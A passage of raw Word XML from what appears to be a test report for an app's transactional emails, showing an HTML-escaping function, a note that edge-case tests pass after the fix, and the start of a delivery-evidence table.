        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">s) </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/&amp;/g</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'&amp;amp;'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/&lt;/g</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/&gt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/"/g</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>quot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/'/g</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'&amp;#39;'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6295E989" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> TC-EDGE-06 and TC-EDGE-07 both pass after the fix. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>emailShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrapper function and all </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>detailRow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> calls now escape </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shopName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. All greeting lines escape </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>clientName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ownerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2D1260" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3DFFCFA9">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5826AC0A" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc228978587"/>
      <w:bookmarkStart w:id="31" w:name="live-delivery-evidence"/>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Live Delivery Evidence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="5EA2DA31"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All 8 test emails were delivered to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>webxcelld@gmail.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>noreply@barberboost.app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> via Resend. Resend message IDs are permanent audit records in the Resend dashboard.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2"/>
        <w:gridCol w:w="2322"/>
        <w:gridCol w:w="2322"/>
        <w:gridCol w:w="2322"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="3148E922"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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="28996C7C"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Email Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:tcBorders>
